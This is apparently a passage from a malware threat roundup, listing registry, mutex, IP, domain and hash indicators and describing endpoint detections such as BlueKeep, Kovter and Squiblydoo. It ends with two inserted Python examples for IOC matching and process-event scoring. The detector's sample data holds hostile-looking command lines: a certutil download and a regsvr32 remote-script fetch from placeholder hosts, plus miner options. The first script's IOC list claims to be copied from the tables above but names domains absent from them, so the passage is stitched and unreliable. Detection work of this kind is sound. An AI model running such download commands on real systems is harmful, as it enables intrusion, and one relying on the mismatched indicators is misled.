Value Name: svchost.exe
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: explorer.exe
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: iexplore.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: svchost.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: explorer.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: iexplore.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 18f8f764
19
<HKCU>\SOFTWARE\07771B47
Value Name: 18f8f764
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 956299e5
19
<HKCU>\SOFTWARE\07771B47
Value Name: 956299e5
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 8de2c2e8
19
<HKCU>\SOFTWARE\07771B47
Value Name: 8de2c2e8
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47 19
<HKCU>\SOFTWARE\07771B47 19
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 412841e8
19
<HKCU>\SOFTWARE\07771B47
Value Name: 412841e8
19
<HKCU>\SOFTWARE\07771B47
Value Name: e1616c62
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: e1616c62
19
<HKCU>\SOFTWARE\07771B47
Value Name: 921a72e2
19
Mutexes Occurrences
C77D0F25 19
Global\07771b47 19
244F2418 19
906A2669 19
Global\2c6cc948 1
<random, matching [a-zA-Z0-9]{5,9}> 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
6[.]172[.]110[.]228 1
201[.]215[.]167[.]131 1
97[.]235[.]190[.]241 1
40[.]71[.]137[.]232 1
124[.]111[.]188[.]126 1
90[.]138[.]227[.]164 1
202[.]115[.]161[.]126 1
181[.]81[.]151[.]50 1
201[.]23[.]14[.]143 1
170[.]168[.]155[.]208 1
141[.]210[.]47[.]144 1
89[.]233[.]158[.]94 1
138[.]77[.]169[.]108 1
209[.]73[.]195[.]196 1
153[.]210[.]7[.]202 1
18[.]194[.]29[.]180 1
79[.]185[.]132[.]120 1
165[.]186[.]14[.]97 1
144[.]101[.]81[.]211 1
12[.]141[.]6[.]226 1
194[.]76[.]104[.]40 1
192[.]17[.]197[.]43 1
217[.]86[.]10[.]90 1
91[.]219[.]84[.]240 1
162[.]77[.]163[.]121 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
cpanel[.]com 1
httpd[.]apache[.]org 1
bugs[.]launchpad[.]net 1
manpages[.]debian[.]org 1
artree[.]jp 1

File Hashes

182d5c7d5ce6de99976e71d209369b13fc50b39096cec58dc71ce1960f4d5a4d
1ee19c580c7268d6285e0c82b645dca1e559d5e2185ea212ff5b9583ccf17bc5
22fee6fcfc138e9da761ec0d4d18f992fc8c5fcb5ddf2c9eefdff527526cddd3
23985f5f3941e691982bd1a4be39ea5ec99c7f20c2abc255a6a932de11667e8e
3ba1f62c87662f1ed2b6a88665780ad3c59d5babe98a47f25a5a6d1f572d232a
3be96d5845f57e8b05307bdf7701df977547a1d6369d0eba825acf97030e57ba
450328b5a05f8ebc8d09b60d3d079594599c117eebc024bb07624138164baf45
524f6f99b1f3298f80c013af319e3282e7897f734e580f352982cdd25e36a7e6
59f1a4d7e0607d6f23ea81c0c6284b5f6702ed188ed258f00098444f0b38b482
5ac5e4ddc7659e83b5d0ac2621a87d57a18c4176dffde9de8844f2ff9000ad84
68334273995b82e16c118b761616d2593a24836e6f0ca5e6b02abbc1e0ed2284
856cc73b1da6f52fa691541cab7eecdc5c6e3e85370514f649302729a8ba197f
95a9df1c371dd97b2668ba4f0753523d2feb54d6e93e03cbbc9183ddc792f3f5
a28ccd19535900d344ad05e5f1334b957813709437a71f5f92aede7316b98153
c4299089028b3b078066fab390e5251859dd961c3df02a589a2cac79dbb8cef7
dfea664ec12d1ce9d22a17837eb0f13ad0bcee39eb868845d4affd08a49fa83b
e094e02e50f22244134668a8a2b3646b6938761cf1601c234a5717247b4b66b9
eeaac2487fcc673e3edefa4f8f51ac282dbce0156fe0c762390b1f72d08f02f8
fc70b1fbba62129d3efc2ed265bf8a55eee2089773b92067f60a9533a8315a61
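The domain and IP tables in this roundup defang indicators with "[.]" and append an occurrence count, which is convenient for reading but not for matching against logs. The following added example (my own code, not Talos tooling) parses lines in that format, refangs them, and checks a constructed resolver log against the domain set. The domain and IP lines are copied from the tables above; the key=value log format and the field names `client` and `query` are assumptions about the log source.

```python
"""Turn the defanged network IOC tables above into matchable indicators and
run them over resolver logs.  Added example; not Talos tooling."""
import re
from typing import Dict, List, Tuple

# Lines taken from the domain and IP tables above: defanged with "[.]" and
# followed by the occurrence count.  The "*See JSON" line is a table footer.
IOC_TABLE = """\
counterstrikexxx[.]no-ip[.]biz 4
zzzzzzzzzzz[.]no-ip[.]biz 2
floripamilgrau[.]no-ip[.]biz 1
john1991[.]no-ip[.]org 1
6[.]172[.]110[.]228 1
201[.]215[.]167[.]131 1
*See JSON for more IOCs
"""

# Constructed resolver log lines (not from the page) in a key=value format;
# the field names are an assumption about your own log source.
DNS_LOG = """\
2020-10-05T11:02:13Z client=10.0.0.25 query=www.example.com type=A
2020-10-05T11:02:14Z client=10.0.0.25 query=counterstrikexxx.no-ip.biz type=A
2020-10-05T11:03:01Z client=10.0.0.31 query=mail.no-ip.biz type=A
2020-10-05T11:04:44Z client=10.0.0.25 query=JOHN1991.NO-IP.ORG. type=A
"""

IOC_LINE = re.compile(r"^(?P<ioc>\S+)\s+(?P<count>\d+)$")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def refang(indicator: str) -> str:
    """Undo the usual defanging ("[.]", "(dot)", "hxxp") and normalise case."""
    s = indicator.strip()
    for token in ("[.]", "(.)", "[dot]", "(dot)"):
        s = s.replace(token, ".")
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    return s.lower().rstrip(".")


def parse_ioc_table(text: str) -> Dict[str, int]:
    """Map each refanged indicator to its occurrence count.  Column headers
    and the "*See JSON" footer do not match the line pattern and are skipped."""
    iocs: Dict[str, int] = {}
    for line in text.splitlines():
        m = IOC_LINE.match(line.strip())
        if m:
            iocs[refang(m["ioc"])] = int(m["count"])
    return iocs


def match_dns_log(log: str, iocs: Dict[str, int]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, client, indicator) for each query that equals an IOC
    domain or sits under it.  A sibling name under the same dynamic-DNS parent
    (mail.no-ip.biz) is deliberately not a hit: the parent zone is not the IOC."""
    domains = [d for d in iocs if not IPV4.fullmatch(d)]
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        timestamp, *pairs = line.split()
        fields = dict(p.split("=", 1) for p in pairs if "=" in p)
        query = fields.get("query", "").lower().rstrip(".")
        for d in domains:
            if query == d or query.endswith("." + d):
                hits.append((timestamp, fields.get("client", "?"), d))
    return hits


if __name__ == "__main__":
    for hit in match_dns_log(DNS_LOG, parse_ioc_table(IOC_TABLE)):
        print(*hit)
```

The suffix match is intentional: a client resolving a host beneath an IOC domain is as interesting as an exact match, while unrelated names under the same public dynamic-DNS parent are not, which is why `mail.no-ip.biz` produces no hit. The occurrence counts are kept so hits can be weighted by how many samples in the roundup contacted the indicator.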

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP (screenshot not reproduced in this text)

ThreatGrid (screenshot not reproduced in this text)

MITRE ATT&CK (technique heat map not reproduced in this text)

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps defend endpoints against the memory-based attacks commonly used by obfuscated malware and exploits. These attacks rely on techniques that bypass typical anti-virus software, but AMP blocked them thanks to its advanced scanning capabilities, which also protect against exploitation of zero-day vulnerabilities.

Dealply adware detected - (5216)
DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into webpages. Adware has also been known to download and install malware.
Process hollowing detected - (3808)
Process hollowing is a technique some programs use to avoid static analysis. In typical usage, a process starts and unpacks its obfuscated or encrypted contents into memory. The parent then manually performs the first stages of launching a child process, but before the child runs, its memory is cleared and filled with memory from the parent instead.
CVE-2019-0708 detected - (1860)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Because the vulnerability can be triggered without authentication and allows remote code execution, worms can use it to spread automatically without human interaction.
Installcore adware detected - (1622)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Certutil.exe is downloading a file - (1530)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information; attackers can abuse this utility to download additional malicious payloads.
XMRig Miner Detected - (1255)
Command line options indicating usage of the XMRig miner have been detected. Malware sometimes uses compromised hosts to mine cryptocurrency on behalf of the attacker.
Kovter injection detected - (1067)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect the presence of monitoring software such as Wireshark and sandboxes and report it to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected - (682)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
Crystalbit-Apple DLL double hijack detected - (541)
A CrystalBit-Apple DLL double hijack was detected. In this attack, the adversary abuses two legitimate vendor applications, such as those from CrystalBit and Apple, as part of a DLL double-hijack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Excessively long PowerShell command detected - (493)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
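Several of the behaviours listed above (certutil downloads, Squiblydoo via regsvr32, XMRig command line options, excessively long PowerShell command lines) are visible in ordinary process-creation telemetry. The following added example (my own code, not Cisco AMP's detection logic) scores constructed process-creation events against those heuristics. The events, the `LONG_CMDLINE` threshold and the `(image, command line)` event shape are assumptions, and the 192.0.2.0/24 addresses are documentation-range placeholders.

```python
"""Score process-creation events against the living-off-the-land behaviours
described above.  Added example; not Cisco AMP's detection logic.  Sample
events, the event shape and the length threshold are assumptions."""
import re
from typing import List, Tuple

URL = re.compile(r"https?://\S+", re.IGNORECASE)
LONG_CMDLINE = 1000  # characters; assumed threshold, tune to your environment

# Constructed (image name, command line) events, not taken from the page.
# The long PowerShell line repeats "QQ" as a stand-in for a base64 blob.
EVENTS: List[Tuple[str, str]] = [
    ("certutil.exe", "certutil.exe -urlcache -split -f http://192.0.2.10/f.dat C:\\Users\\Public\\f.dat"),
    ("certutil.exe", "certutil.exe -dump C:\\certs\\server.cer"),
    ("regsvr32.exe", "regsvr32.exe /s /i:http://192.0.2.10/x.sct scrobj.dll"),
    ("regsvr32.exe", "regsvr32.exe /s C:\\Program Files\\Vendor\\component.dll"),
    ("powershell.exe", "powershell.exe -NoProfile -EncodedCommand " + "QQ" * 800),
    ("powershell.exe", "powershell.exe -NoProfile -Command Get-Service"),
    ("svchost.exe", "svchost.exe -o stratum+tcp://192.0.2.20:3333 -u wallet --donate-level=1"),
]


def classify(image: str, cmdline: str) -> List[str]:
    """Return the heuristics an event trips (empty list when it looks benign).

    The first three checks key on the image name because the abused binary is
    a signed Windows tool; the miner check does not, because miners are
    routinely renamed (here posing as svchost.exe) and only the pool options
    give them away."""
    name = image.lower()
    lowered = cmdline.lower()
    findings: List[str] = []
    if name == "certutil.exe" and URL.search(cmdline):
        findings.append("certutil download")        # certutil.exe is downloading a file
    if name == "regsvr32.exe" and URL.search(cmdline):
        findings.append("squiblydoo")               # script content fetched from a remote host
    if name in ("powershell.exe", "pwsh.exe") and len(cmdline) > LONG_CMDLINE:
        findings.append("long powershell command")  # possible obfuscated script
    if "stratum+tcp://" in lowered or "--donate-level" in lowered:
        findings.append("xmrig options")            # mining-pool command line options
    return findings


def scan(events: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Flatten to (image, finding) pairs for everything worth an alert."""
    return [(image, f) for image, cmd in events for f in classify(image, cmd)]


if __name__ == "__main__":
    for image, finding in scan(EVENTS):
        print(f"{finding:26} {image}")
```

Each benign twin in the event list (a local `certutil -dump`, a regsvr32 registration of a local DLL, a short PowerShell command) passes clean, which is the property to preserve when tuning these rules: the URL and length conditions carry the signal, not the presence of the tool itself.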
